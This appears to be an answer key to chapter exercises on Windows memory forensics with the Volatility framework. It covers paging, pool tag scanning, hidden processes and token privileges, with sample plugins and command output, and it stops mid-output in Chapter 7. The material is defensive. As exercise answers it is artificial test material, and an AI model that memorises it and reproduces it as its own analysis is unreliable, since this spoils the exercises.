----------------------------------------------------------------------
Chapter 1: Systems Overview
----------------------------------------------------------------------

1. What component assists the CPU in address translation?

   A) The Memory Management Unit (MMU)
   B) The Address Translation Unit (ATU)
   C) The Central Memory Hub (CMH)
   D) The Memory Management Controller (MMC)

   The correct answer is: A

2. When dealing with raw, padded memory dumps, a physical address is an offset into the memory dump file. True or False?

   The correct answer is: True

3. Which statement(s) are false?

   A) IA32 architecture is also known as x86
   B) Physical Address Extension (PAE) allows up to 64GB of physical memory
   C) 64-bit CPUs only actually use 52 bits of the available address space
   D) A typical page size is 4KB, but it can be larger if the page size entry (PSE) flag is set
   E) All of the above

   The correct answer is: C (they use 48 bits)

4. Which CPU register is used to store the directory table base (page directory base)?

   A) CR0
   B) EAX
   C) CR3
   D) DR3

   The correct answer is: C

5. Which statement(s) are true?

   A) Paging allows processes to "see" more RAM than is physically present
   B) The page fault handler code must never be paged
   C) Paging complicates memory forensics because not all data is memory resident at the time of acquisition
   D) Paging writes potentially valuable volatile evidence to non-volatile storage such as disk
   E) All of the above

   The correct answer is: E

6. The winlogon.exe process (PID 628) in sample001.bin has a virtual address 0x77a80000 and DTB value 0x682e000. What is the corresponding physical offset? What do you see at the physical offset within the file?
   The correct answer is: 72159232 (an MZ header)

   $ python vol.py -f AMF_MemorySamples/windows/sample001.bin volshell
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Current context: System @ 0x823c8830, pid=4, ppid=0 DTB=0x39000
   Python 2.7.6 (v2.7.6:3a1db0d2747e, Nov 10 2013, 00:42:54)
   Type "copyright", "credits" or "license" for more information.

   IPython 2.0.0 -- An enhanced Interactive Python.
   ?         -> Introduction and overview of IPython's features.
   %quickref -> Quick reference.
   help      -> Python's own help system.
   object?   -> Details about 'object', use 'object??' for extra details.

   In [1]: cc(pid = 628)
   Current context: winlogon.exe @ 0x82189da0, pid=628, ppid=356 DTB=0x682e000

   In [2]: proc().get_process_address_space().vtop(0x77a80000)
   Out[2]: 72159232

   In [3]: quit()

   $ xxd -s 72159232 AMF_MemorySamples/windows/sample001.bin | less
   44d1000: 4d5a 9000 0300 0000 0400 0000 ffff 0000  MZ..............
   44d1010: b800 0000 0000 0000 4000 0000 0000 0000  ........@.......
   44d1020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
   44d1030: 0000 0000 0000 0000 0000 0000 f000 0000  ................
   44d1040: 0e1f ba0e 00b4 09cd 21b8 014c cd21 5468  ........!..L.!Th
   44d1050: 6973 2070 726f 6772 616d 2063 616e 6e6f  is program canno
   44d1060: 7420 6265 2072 756e 2069 6e20 444f 5320  t be run in DOS 
   44d1070: 6d6f 6465 2e0d 0d0a 2400 0000 0000 0000  mode....$.......
   44d1080: 1ac1 36e1 5ea0 58b2 5ea0 58b2 5ea0 58b2  ..6.^.X.^.X.^.X.

----------------------------------------------------------------------
Chapter 2: Data Structures
----------------------------------------------------------------------

1. Which of the following data types consume 4 bytes on a 32-bit system?

   A) char
   B) unsigned int
   C) long
   D) pointer to an int
   E) pointer to a char

   The correct answer is: B, C, D, E

2. Which statement(s) are false about arrays?
   A) Elements can be found by multiplying the desired index by the size of an element and adding it to the array's base address
   B) Elements are contiguous in memory
   C) Elements must be of a single data type (homogeneous)
   D) Arrays cannot store pointers

   The correct answer is: D

3. Which statement(s) are true about structures?

   A) Structures can store various different data types
   B) Structure sizes and member offsets can vary depending on compiler optimizations
   C) Operating systems and applications make heavy use of structures
   D) The names of structure members should indicate their purpose

   The correct answer is: A, B, C, D

4. Linked lists are easily manipulated by rootkits. True or False?

   The correct answer is: True

5. Performing memory forensics at the physical layer (i.e. without virtual address translation) limits analysis because:

   A) Strings that cross page boundaries may be fragmented in physical memory
   B) You cannot traverse linked lists
   C) Some hash tables and trees are never found in physical memory
   D) _UNICODE_STRING data types store metadata separately from the actual string content

   The correct answer is: A, B, D

6. Perform the following steps:

   A) Create a C source file with one or more data structures
   B) Initialize the structure members in your main() function and print out their values
   C) Compile it with GCC or Microsoft Visual Studio Express
   D) Analyze the binary in a disassembler, or pause it in a debugger, and inspect the offsets for the structure members being passed to the print function
   E) Do your offsets match your expectations?

   The correct answer is: N/A

----------------------------------------------------------------------
Chapter 3: The Volatility Framework
----------------------------------------------------------------------

1. Install Volatility and the dependency libraries (unless you're working with the standalone version).

   The correct answer is: N/A

2. Run the "vol.py --info" command. What profiles does your version support?
   The correct answer is: N/A

3. Run the "vol.py --help" command with and without a plugin name. How does the output differ?

   The correct answer is: You'll see the plugin-specific options

4. Run the kdbgscan plugin against a Windows memory sample.

   A) What profile does it suggest?
   B) What is the virtual address of the kernel debugger data structure?
   C) Were any inaccurate profiles suggested? Why or why not?

   The virtual address will be shown on the line with "Offset(V)". In some cases, you'll see slightly inaccurate profiles (for example Win7 SP1 versus Win7 SP0) because the OS data structures look similar. In these cases, look at the Service Pack value in the kdbgscan output to determine which suggestion is correct.

5. Using the profile you determined in step 4, list processes in your memory dump. Then run the same plugin again, but redirect output to a text file so you can save it for later analysis.

   The correct answer is: N/A

6. Perform the following steps:

   A) Copy exampleplugin.py into volatility/plugins
   B) Edit exampleplugin.py and change the name from ExamplePlugin to a name of your choice
   C) Edit the description of the plugin
   D) Edit the plugin to print the process ID (UniqueProcessId) in addition to the process name
   E) Run "vol.py --info" and see if your new plugin is registered
   F) Run your new plugin and observe the output
   G) Add a new method named render_csv (comma separated values) to the plugin and configure it to output data in CSV format
   H) Run the plugin with --output=csv and observe the output

   The correct answer is: (see below for an example)

   import volatility.utils as utils
   import volatility.commands as commands
   import volatility.win32.tasks as tasks

   class MyNewPlugin(commands.Command):
       """This is an example plugin that I modified"""

       def calculate(self):
           """This method performs the work"""
           # Load the kernel address space for the memory image given with -f
           addr_space = utils.load_as(self._config)
           # Walk the active process list and hand each _EPROCESS to the renderer
           for proc in tasks.pslist(addr_space):
               yield proc

       def render_text(self, outfd, data):
           """This method formats output to the terminal.

           :param outfd: output file descriptor
           :param data: the generator returned by calculate()
           """
           for proc in data:
               outfd.write("Process: {0} PID {1}\n".format(proc.ImageFileName, proc.UniqueProcessId))

       def render_csv(self, outfd, data):
           """Selected with --output=csv: one "name,pid" line per process"""
           for proc in data:
               outfd.write("{0},{1}\n".format(proc.ImageFileName, proc.UniqueProcessId))

----------------------------------------------------------------------
Chapter 4: Memory Acquisition
----------------------------------------------------------------------

1. If a suspect computer is not powered on, you can attempt to recover memory in which of the following ways?

   A) page files on disk
   B) hibernation files
   C) old crash dumps
   D) introspection

   The correct answer is: A, B, C

2. Why is memory acquisition not a trivial task? What are some of the "gotchas" you need to watch out for?

   The correct answer is: cache coherency, device memory, anti-forensics, etc.

3. Which API is not commonly used by acquisition tools?

   A) MmCreateMemoryDump
   B) MmMapMemoryDumpMdl
   C) MmProbeAndLockPages
   D) ZwMapViewOfMemory
   E) MmMapIoSpace

   The correct answer is: A

4. It is important to run live response tools to gather evidence before acquiring physical memory, so that your memory capture contains the extra data generated by the live IR tools. True or False?

   The correct answer is: False (you should run live IR tools *after* acquiring physical memory, so you don't taint the evidence)

5. Perform the following steps:

   A) Dump memory from one of your machines to local USB/Firewire/ESATA
   B) Dump memory across the network (you can use a NAT or Host-only VM configuration). Make sure to use compression and encryption
   C) If possible, analyze memory using remote interrogation. Capture traffic while you run Volatility plugins. How much data is transferred with a basic process listing?

   The correct answer is: N/A

6. Perform the following steps:

   A) Analyze the registry of a target system to determine how many page files are in use
   B) Extract the page files from the running system (with TSK Windows binaries).
   C) Can Volatility analyze page files directly? Why or why not?
   D) Can you use Volatility's imagecopy plugin to convert a page file into a raw memory dump? Why or why not?
   E) Use page_brute to scan across your extracted page files. Does it find any hits?
   F) If necessary, extend page_brute's default Yara rules and scan your page files again.

   The correct answer is: Volatility cannot analyze page files directly at this time. You cannot use imagecopy to convert a page file into a raw memory dump (a page file holds only the "holes", the pages that were not resident in RAM).

----------------------------------------------------------------------
Chapter 5: Windows Objects and Pool Allocation
----------------------------------------------------------------------

1. Run the objtypescan plugin against a memory dump from a system you own.

   A) How many different executive object types exist?
   B) Does the list of objects match what WinObj (Sysinternals) reports?
   C) What's the most highly used object type on your system?
   D) Which object types can be paged to disk?
   E) What is the 4-byte key (AKA tag) for process objects?

   The correct answer is: The number of executive object types differs per OS version, and the most highly used object type will differ per system.
   Here's an example:

   $ python ~/Desktop/GitHub/volatility/vol.py -f Win81x64-bf5ed93b.vmem --profile=Win8SP1x64 objtypescan
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Offset             nObjects nHandles Key  Name                     PoolType
   ------------------ -------- -------- ---- ------------------------ --------------------
   0x000000007cd65080 0x19     0x14     Dxgk DxgkSharedResource       PagedPool
   0x000000007cd65220 0x1      0x1      Dxgk DxgkSharedSyncObject     PagedPool
   0x000000007d00e890 0x5      0x5      Filt FilterCommunicationPort  NonPagedPoolNx
   0x000000007d04d4d0 0xf      0xf      PcwO PcwObject                PagedPool
   0x000000007e465cf0 0x5      0x5      Filt FilterConnectionPort     NonPagedPoolNx
   0x000000007e4725f0 0x3e     0x197    Proc Process                  NonPagedPoolNx
   0x000000007e472d70 0x0      0x0      Debu DebugObject              NonPagedPoolNx
   0x000000007e473420 0x0      0x0      User UserApcReserve           NonPagedPoolNx
   0x000000007e474610 0x18     0x0      Call Callback                 NonPagedPoolNx
   0x000000007e475080 0x31     0xa0     Dire Directory                PagedPool
   0x000000007e476ce0 0x60d    0x1e5    Toke Token                    PagedPool
   0x000000007e481740 0x1ace   0x1b9b   Even Event                    NonPagedPoolNx
   0x000000007e481c60 0x3      0x0      TmTx TmTx                     NonPagedPoolNx
   0x000000007e481dc0 0x8      0x8      TmTm TmTm                     NonPagedPoolNx
   0x000000007e481f20 0x1ca6   0x552    File File                     NonPagedPoolNx
   0x000000007e4823f0 0x530    0x530    Wait WaitCompletionPacket     NonPagedPoolNx
   0x000000007e482550 0xc0     0xb6     IoCo IoCompletion             NonPagedPoolNx
   0x000000007e4826b0 0x7e     0x0      Driv Driver                   NonPagedPoolNx
   0x000000007e485f20 0x2e     0x0      ObjT Type                     NonPagedPoolNx
   0x000000007e487c50 0x0      0x0      Prof Profile                  NonPagedPoolNx
   0x000000007e487db0 0x14d    0x14d    IRTi IRTimer                  NonPagedPoolNx
   0x000000007e48a590 0x0      0x0      IoCo IoCompletionReserve      NonPagedPoolNx
   0x000000007e48cc10 0x6      0x6d     Wind WindowStation            NonPagedPoolNx
   0x000000007e48cd70 0x1      0x0      Keye KeyedEvent               PagedPool
   0x000000007e48d470 0x1c5    0x0      Devi Device                   NonPagedPoolNx
   0x000000007e48d5d0 0x1      0x0      Cont Controller               NonPagedPoolNx
   0x000000007e48d730 0xb      0x0      Adap Adapter                  NonPagedPoolNx
   0x000000007e48f830 0xa6     0xa6     TpWo TpWorkerFactory          NonPagedPoolNx
   0x000000007e48f990 0x25     0x29     Comp Composition              NonPagedPoolNx
   0x000000007e48faf0 0xa      0x3f     Desk Desktop                  NonPagedPoolNx
   0x000000007e490980 0x0      0x0      TmEn TmEn                     NonPagedPoolNx
   0x000000007e490ae0 0x11     0x11     TmRm TmRm                     NonPagedPoolNx
   0x000000007e492470 0x377    0x444    Thre Thread                   NonPagedPoolNx
   0x000000007e497660 0xd0     0x5f     Symb SymbolicLink             PagedPool
   0x000000007e497bb0 0x16     0x1b     Job  Job                      NonPagedPoolNx
   0x000000007e4aceb0 0x191    0x228    Muta Mutant                   NonPagedPoolNx
   0x000000007e544730 0x4a0    0x49a    ALPC ALPC Port                NonPagedPoolNx
   0x000000007e546790 0x8c5    0x8d5    Key  Key                      PagedPool
   0x000000007e549080 0x705    0x325    Sect Section                  PagedPool
   0x000000007e549730 0x2      0x10     Sess Session                  NonPagedPoolNx
   0x000000007e54b8c0 0x5f     0x5f     Time Timer                    NonPagedPoolNx
   0x000000007e54ba20 0x559    0x564    Sema Semaphore                NonPagedPoolNx
   0x000000007e5512c0 0x5      0x2      Powe PowerRequest             NonPagedPoolNx
   0x000000007e552a30 0x14     0x13     WmiG WmiGuid                  NonPagedPoolNx
   0x000000007e559a30 0x7      0x7      EtwC EtwConsumer              NonPagedPoolNx
   0x000000007e55aa30 0xf66    0xf66    EtwR EtwRegistration          NonPagedPoolNx

   The list of objects shown by objtypescan should match WinObj. In the example output above, the most frequently used object type is File (file objects). Objects in the PagedPool can be paged. The tag/key for process objects is Proc.

2. Perform the following steps:

   A) Take two memory dumps - one before running allocator.exe and one after
   B) Use the pooltracker plugin to compare the changes it makes to the "Muta" pools
   C) If you integrate pooltag.txt into your pooltracker plugin output, what description does it provide for "Muta" objects?
   D) Run the mutantscan plugin. Does the output support the theories about allocator.exe's activity based on pool tag use statistics?
   Here's an example of the before and after status:

   $ python vol.py -f before.vmem --profile=Win7SP1x86 pooltracker -t Muta
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Tag    NpAllocs NpFrees  NpBytes  PgAllocs PgFrees  PgBytes  Driver               Reason
   ------ -------- -------- -------- -------- -------- -------- -------------------- ------
   Muta     655173   646431   908624        0        0        0

   $ python vol.py -f after.vmem --profile=Win7SP1x86 pooltracker -t Muta
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Tag    NpAllocs NpFrees  NpBytes  PgAllocs PgFrees  PgBytes  Driver               Reason
   ------ -------- -------- -------- -------- -------- -------- -------------------- ------
   Muta     660764   646652  1424032        0        0        0

   As you can see, there are approximately 5591 new mutex objects allocated (660764 - 655173 NpAllocs). By integrating the pooltag.txt file, you'll see these objects are "Mutant objects":

   $ python vol.py -f after.vmem --profile=Win7SP1x86 pooltracker -t Muta --tagfile=~/Desktop/pooltag.txt
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Tag    NpAllocs NpFrees  NpBytes  PgAllocs PgFrees  PgBytes  Driver               Reason
   ------ -------- -------- -------- -------- -------- -------- -------------------- ------
   Muta     660764   646652  1424032        0        0        0                      Mutant objects

   When running the mutantscan plugin, you'll see the new mutexes:

   $ python vol.py -f after.vmem --profile=Win7SP1x86 mutantscan
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Offset(P)          #Ptr     #Hnd     Signal Thread     CID       Name
   ------------------ -------- -------- ------ ---------- --------- ----
   0x0000000000184b70        2        1      0 0x864ed290  3820:824 Mutex6145
   0x0000000000184bd0        2        1      0 0x864ed290  3820:824 Mutex6144
   0x0000000000184c30        2        1      0 0x864ed290  3820:824 Mutex6143
   0x0000000000935040        2        1      0 0x864ed290  3820:824 Mutex2976
   0x00000000009350d8        2        1      0 0x864ed290  3820:824 Mutex2977
   0x0000000000935cf8        2        1      0 0x864ed290  3820:824 Mutex7138
   0x0000000000935d58        2        1      0 0x864ed290  3820:824 Mutex7137
   0x0000000000935db8        2        1      0 0x864ed290  3820:824 Mutex7136
   0x00000000009585b0        2        1      0 0x864ed290  3820:824 Mutex471
   0x0000000000958808        2        1      0 0x864ed290  3820:824 Mutex3189
   0x0000000000958868        2        1      0 0x864ed290  3820:824 Mutex3188
   0x00000000009589b0        2        1      0 0x864ed290  3820:824 Mutex404
   0x0000000000cee450        2        1      0 0x864ed290  3820:824 Mutex9685
   0x0000000000cee4b0        2        1      0 0x864ed290  3820:824 Mutex9684
   0x0000000000cee510        2        1      0 0x864ed290  3820:824 Mutex9683
   0x0000000000cee570        2        1      0 0x864ed290  3820:824 Mutex9682
   0x0000000000cee670        2        1      0 0x864ed290  3820:824 Mutex2693
   0x0000000000cee6d0        2        1      0 0x864ed290  3820:824 Mutex2692
   0x0000000000cee7c8        2        1      0 0x864ed290  3820:824 Mutex8029
   0x0000000000cee828        2        1      0 0x864ed290  3820:824 Mutex8028
   0x0000000000cee888        2        1      0 0x864ed290  3820:824 Mutex8027
   0x0000000000cee8e8        2        1      0 0x864ed290  3820:824 Mutex8026
   [snip]

3. The memory image sample002.bin is running a kernel driver that defines the following structure type. The driver allocates structures from nonpaged pools using tag 'RdeR'. Write a pool scanner to find these allocations and parse them.

   typedef struct _MMREDIR {
       int src_port;
       int dst_port;
       int redirect_port;
       char src_address[32];
       char dst_address[32];
       char redirect_address[32];
   } MMREDIR, *PMMREDIR;

   Here's an example plugin:

   import volatility.plugins.common as common
   import volatility.utils as utils
   import volatility.poolscan as poolscan
   import volatility.obj as obj

   class RedirScanner(poolscan.SinglePoolScanner):
       # A hit must carry the driver's tag, live in non-paged pool, and be
       # exactly 120 bytes (8-byte _POOL_HEADER + 108-byte _MMREDIR, rounded to 8)
       checks = [
           ('PoolTagCheck', dict(tag = 'RdeR')),
           ('CheckPoolType', dict(non_paged = True, paged = False)),
           ('CheckPoolSize', dict(condition = lambda x: x == 120)),
       ]

   class RedirTypes(obj.ProfileModification):
       # Teach the profile the _MMREDIR layout from the typedef above
       def modification(self, profile):
           profile.vtypes.update({
               '_MMREDIR': [ None, {
                   'src_port': [ 0, ['int']],
                   'dst_port': [ 4, ['int']],
                   'redirect_port': [ 8, ['int']],
                   'src_address': [ 12, ['String', dict(length = 32)]],
                   'dst_address': [ 44, ['String', dict(length = 32)]],
                   'redirect_address': [ 76, ['String', dict(length = 32)]],
               }]})

   class RedirScan(common.AbstractWindowsCommand):
       """Scan for _MMREDIR structures allocated by RedirPro"""

       def calculate(self):
           ## Get a kernel address space
           kernel_space = utils.load_as(self._config)
           header_size = kernel_space.profile.get_obj_size("_POOL_HEADER")
           for offset in RedirScanner().scan(kernel_space):
               # The structure immediately follows the pool header
               mmredir = obj.Object("_MMREDIR", offset = offset + header_size, vm = kernel_space)
               yield mmredir

       def render_text(self, outfd, data):
           self.table_header(outfd, [("Offset", "[addrpad]"),
                                     ("SrcPort", "8"),
                                     ("DstPort", "8"),
                                     ("RedirPort", "8"),
                                     ("SrcAddr", "20"),
                                     ("DstAddr", "20"),
                                     ("RedirAddr", "20"),
                                     ])
           for mmredir in data:
               self.table_row(outfd, mmredir.obj_offset,
                              mmredir.src_port,
                              mmredir.dst_port,
                              mmredir.redirect_port,
                              mmredir.src_address,
                              mmredir.dst_address,
                              mmredir.redirect_address)

   The plugin's output should appear like this:

   $ python vol.py -f sample002.bin redirscan --profile=Win7SP1x86
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Offset     SrcPort  DstPort  RedirPort SrcAddr              DstAddr              RedirAddr
   ---------- -------- -------- --------- -------------------- -------------------- --------------------
   0x85f336e8        0       80      8080 24.194.35.12         66.214.40.105        10.10.3.20
   0x861f3008        0        0         0
   0x86379200        0        0         0
   0x863a2120    30021      443        22 any                  66.214.40.105        192.168.172.42
   0x864251f8        0        0         0

4. Run the pslist and psscan plugins against sample003.bin.

   A) Which process(es) are active?
   B) Which process(es) have terminated?
   C) Which process(es) are leftover from a previous reboot?
   All processes in the pslist output are active:

   $ python vol.py -f sample003.bin pslist
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Offset(V)  Name                 PID    PPID   Thds   Hnds     Sess   Wow64  Start                          Exit
   ---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
   0x819cc830 System                    4      0     51      254 ------      0
   0x817e4670 smss.exe                360      4      3       19 ------      0 2008-11-26 07:38:11 UTC+0000
   0x8181bd78 csrss.exe               596    360     10      322      0      0 2008-11-26 07:38:13 UTC+0000
   0x8182b100 winlogon.exe            620    360     16      503      0      0 2008-11-26 07:38:14 UTC+0000
   0x8183ba78 services.exe            672    620     15      245      0      0 2008-11-26 07:38:15 UTC+0000
   0x817dbc30 lsass.exe               684    620     21      347      0      0 2008-11-26 07:38:15 UTC+0000
   0x81859d70 svchost.exe             844    672     19      198      0      0 2008-11-26 07:38:18 UTC+0000
   0x8183d360 svchost.exe             932    672     10      229      0      0 2008-11-26 07:38:18 UTC+0000
   0x818a2300 svchost.exe            1064    672     63     1308      0      0 2008-11-26 07:38:20 UTC+0000
   0x817f7da0 svchost.exe            1164    672      5       77      0      0 2008-11-26 07:38:23 UTC+0000
   0x8180e6f0 svchost.exe            1264    672     14      209      0      0 2008-11-26 07:38:25 UTC+0000
   0x817ca478 explorer.exe           1516   1452     12      362      0      0 2008-11-26 07:38:27 UTC+0000
   0x816e75e8 spoolsv.exe            1648    672     12      112      0      0 2008-11-26 07:38:28 UTC+0000
   0x816af860 VMwareTray.exe         1896   1516      1       26      0      0 2008-11-26 07:38:31 UTC+0000
   0x816af448 VMwareUser.exe         1904   1516      1       28      0      0 2008-11-26 07:38:31 UTC+0000
   0x816a13c0 VMwareService.e        1756    672      3       45      0      0 2008-11-26 07:38:45 UTC+0000
   0x816557e0 alg.exe                 512    672      6      105      0      0 2008-11-26 07:38:53 UTC+0000
   0x81643b28 wuauclt.exe            1372   1064      8      225      0      0 2008-11-26 07:39:38 UTC+0000
   0x8164e3a8 wscntfy.exe             560   1064      1       31      0      0 2008-11-26 07:44:57 UTC+0000

   According to the psscan output, only one process is terminated (cmd.exe pid 940):

   $ python vol.py -f sample003.bin psscan
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Offset(P)          Name             PID    PPID   PDB        Time created                   Time exited
   ------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
   0x000000000181b748 alg.exe             992    660 0x08140260 2008-11-15 23:43:25 UTC+0000
   0x0000000001843b28 wuauclt.exe        1372   1064 0x08140180 2008-11-26 07:39:38 UTC+0000
   0x000000000184e3a8 wscntfy.exe         560   1064 0x081402a0 2008-11-26 07:44:57 UTC+0000
   0x00000000018557e0 alg.exe             512    672 0x08140260 2008-11-26 07:38:53 UTC+0000
   0x000000000185dda0 cmd.exe             940   1516 0x081401a0 2008-11-26 07:43:39 UTC+0000   2008-11-26 07:45:49 UTC+0000
   0x00000000018a13c0 VMwareService.e    1756    672 0x08140220 2008-11-26 07:38:45 UTC+0000
   0x00000000018af448 VMwareUser.exe     1904   1516 0x08140100 2008-11-26 07:38:31 UTC+0000
   0x00000000018af860 VMwareTray.exe     1896   1516 0x08140200 2008-11-26 07:38:31 UTC+0000
   0x00000000018e75e8 spoolsv.exe        1648    672 0x081401e0 2008-11-26 07:38:28 UTC+0000
   0x00000000019456e8 csrss.exe           592    360 0x08140040 2008-11-15 23:42:56 UTC+0000
   0x0000000001946020 svchost.exe         828    660 0x081400c0 2008-11-15 23:42:57 UTC+0000
   0x00000000019467e0 services.exe        660    616 0x08140080 2008-11-15 23:42:56 UTC+0000
   0x000000000194f658 svchost.exe        1016    660 0x08140100 2008-11-15 23:42:57 UTC+0000
   0x00000000019533c8 svchost.exe         924    660 0x081400e0 2008-11-15 23:42:57 UTC+0000
   0x00000000019ca478 explorer.exe       1516   1452 0x081401c0 2008-11-26 07:38:27 UTC+0000
   0x00000000019dbc30 lsass.exe           684    620 0x081400a0 2008-11-26 07:38:15 UTC+0000
   0x00000000019e4670 smss.exe            360      4 0x08140020 2008-11-26 07:38:11 UTC+0000
   0x00000000019f7da0 svchost.exe        1164    672 0x08140140 2008-11-26 07:38:23 UTC+0000
   0x0000000001a0e6f0 svchost.exe        1264    672 0x08140160 2008-11-26 07:38:25 UTC+0000
   0x0000000001a1bd78 csrss.exe           596    360 0x08140040 2008-11-26 07:38:13 UTC+0000
   0x0000000001a2b100 winlogon.exe        620    360 0x08140060 2008-11-26 07:38:14 UTC+0000
   0x0000000001a3ba78 services.exe        672    620 0x08140080 2008-11-26 07:38:15 UTC+0000
   0x0000000001a3d360 svchost.exe         932    672 0x081400e0 2008-11-26 07:38:18 UTC+0000
   0x0000000001a59d70 svchost.exe         844    672 0x081400c0 2008-11-26 07:38:18 UTC+0000
   0x0000000001aa2300 svchost.exe        1064    672 0x08140120 2008-11-26 07:38:20 UTC+0000
   0x0000000001bcc830 System                4      0 0x00319000

   All of the processes that started on 2008-11-15 are leftover from a previous reboot.

5. Which of the following is not a weakness of the pool tag scanning approach?

   A) It's possible to find false positives (decoys, fake objects, etc.)
   B) Pool tags can be manipulated because they're not essential to the OS
   C) Large allocations (> 4096 bytes) cannot be found with pool tag scanning
   D) Not all kernel allocations are tagged in the first place (i.e. ExAllocatePool)
   E) All of the above

   The correct answer is: E

----------------------------------------------------------------------
Chapter 6: Processes, Handles, and Tokens
----------------------------------------------------------------------

1. Which of the following situations should have you worried?

   A) Two or more instances of svchost.exe are running
   B) The parent of winlogon.exe is services.exe
   C) csrss.exe is running from the "C:\Windows\system32" directory
   D) ssms.exe is running
   E) explorer.exe is running from the "C:\Windows\system32" directory

   The correct answer is: B, D, E

2. Run the psscan plugin on one of your memory images and generate a Graphviz diagram (--output=dot --output-file=graph.dot). Why doesn't explorer.exe have a parent?

   The correct answer is: Explorer's parent (userinit.exe) typically exits after starting explorer.

3. Run the psxview plugin against sample003.bin.

   A) Which process(es) are hidden?
   B) In what ways did the rootkit attempt to hide?
   $ python vol.py -f sample003.bin psxview --apply-rules
   Volatility Foundation Volatility Framework 2.4 (Beta)
   Offset(P)  Name                 PID    pslist psscan thrdproc pspcid csrss session deskthrd ExitTime
   ---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- --------
   0x01a2b100 winlogon.exe            620 True   True   True     True   True  True    True
   0x01a3d360 svchost.exe             932 True   True   True     True   True  True    True
   0x018a13c0 VMwareService.e        1756 True   True   True     True   True  True    True
   0x018e75e8 spoolsv.exe            1648 True   True   True     True   True  True    True
   0x019dbc30 lsass.exe               684 True   True   True     True   True  True    True
   0x0184e3a8 wscntfy.exe             560 True   True   True     True   True  True    True
   0x018af860 VMwareTray.exe         1896 True   True   True     True   True  True    True
   0x01a4bc20 network_listene        1696 False  False  True     True   True  True    True
   0x01843b28 wuauclt.exe            1372 True   True   True     True   True  True    True
   0x01a59d70 svchost.exe             844 True   True   True     True   True  True    True
   0x018af448 VMwareUser.exe         1904 True   True   True     True   True  True    True
   0x019f7da0 svchost.exe            1164 True   True   True     True   True  True    True
   0x018557e0 alg.exe                 512 True   True   True     True   True  True    True
   0x01a3ba78 services.exe            672 True   True   True     True   True  True    True
   0x019ca478 explorer.exe           1516 True   True   True     True   True  True    True
   0x01a0e6f0 svchost.exe            1264 True   True   True     True   True  True    True
   0x01aa2300 svchost.exe            1064 True   True   True     True   True  True    True
   0x019e4670 smss.exe                360 True   True   True     True   Okay  Okay    Okay
   0x01bcc830 System                    4 True   True   True     True   Okay  Okay    Okay
   0x01a1bd78 csrss.exe               596 True   True   True     True   Okay  True    True
   0x01946020 svchost.exe             828 False  True   False    False  False False   False
   0x019533c8 svchost.exe             924 False  True   True     False  False False   False
   0x0185dda0 cmd.exe                 940 Okay   True   Okay     Okay   Okay  Okay    Okay     2008-11-26 07:45:49 UTC+0000
   0x019467e0 services.exe            660 False  True   True     False  False False   False
   0x0181b748 alg.exe                 992 False  True   True     False  False False   False
   0x0194f658 svchost.exe            1016 False  True   True     False  False False   False
   0x019456e8 csrss.exe               592 False  True   True     False  Okay  False   False

   The "network_listene" process is hidden from the pslist and psscan plugins. It has been unlinked from PsActiveProcessHead, and the values used by the pool scanner have been modified.

4. Run the getsids plugin against sample005.bin.

   A) How many users are logged on?
   B) What are their names?
   C) Is there any evidence of privilege escalation attacks?

   The correct answer is: One user is logged on with SID S-1-5-21-219294376-1976090562-3929857903-1112 (saadmin). Many processes, including cmd.exe and explorer.exe, have gained domain admin:

   explorer.exe (1928): S-1-5-21-219294376-1976090562-3929857903-1112 (saadmin)
   explorer.exe (1928): S-1-5-21-219294376-1976090562-3929857903-513 (Domain Users)
   explorer.exe (1928): S-1-1-0 (Everyone)
   explorer.exe (1928): S-1-5-32-545 (Users)
   explorer.exe (1928): S-1-5-32-544 (Administrators)
   explorer.exe (1928): S-1-5-4 (Interactive)
   explorer.exe (1928): S-1-5-11 (Authenticated Users)
   explorer.exe (1928): S-1-5-15 (This Organization)
   explorer.exe (1928): S-1-5-5-0-46433 (Logon Session)
   explorer.exe (1928): S-1-2-0 (Local (Users with the ability to log in locally))
   explorer.exe (1928): S-1-5-21-219294376-1976090562-3929857903-512 (Domain Admins)

5. Run the privs plugin against sample004.bin and sample005.bin.

   A) In sample004.bin, which process(es) have the ability to load kernel drivers?
   B) In sample005.bin, the dfssvc.exe process (PID 1608) enabled SeRestorePrivilege and SeBackupPrivilege. Do you think that's something to be worried about?
   The correct answer is:

   $ python vol.py -f sample004.bin privs -r driver | grep Enabled
   Volatility Foundation Volatility Framework 2.4 (Beta)
    624 winlogon.exe      10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
    684 lsass.exe         10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1024 svchost.exe       10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1356 spoolsv.exe       10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1212 userinit.exe      10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1096 explorer.exe      10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   2008 reader_sl.exe     10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1796 AdobeARM.exe      10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1120 cmd.exe           10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers
   1396 mdd.exe           10 SeLoadDriverPrivilege    Present,Enabled  Load and unload device drivers

   The fact that dfssvc.exe enabled SeRestorePrivilege and SeBackupPrivilege is not concerning, because dfssvc.exe is the Distributed File System Service process.

6. Which process is currently accessing the ")!VoqA.I4" mutex in sample004.bin?

   The correct answer is: pid 1096

----------------------------------------------------------------------
Chapter 7: Process Memory Internals
----------------------------------------------------------------------

1. Run the processmemory.exe program on one of your virtual machines. Dump memory while it's running. What is the process ID of processmemory.exe in your memory dump?
   C:\> processmemory.exe
   Heap allocation: 1531c0
   File mapping created at: 360000

   In this case, the pid is 928:

   $ python vol.py -f XPSP3-8c391840.vmem pslist -n processmemory
   Volatility Foundation Volatility Framework 2.4 (Beta)
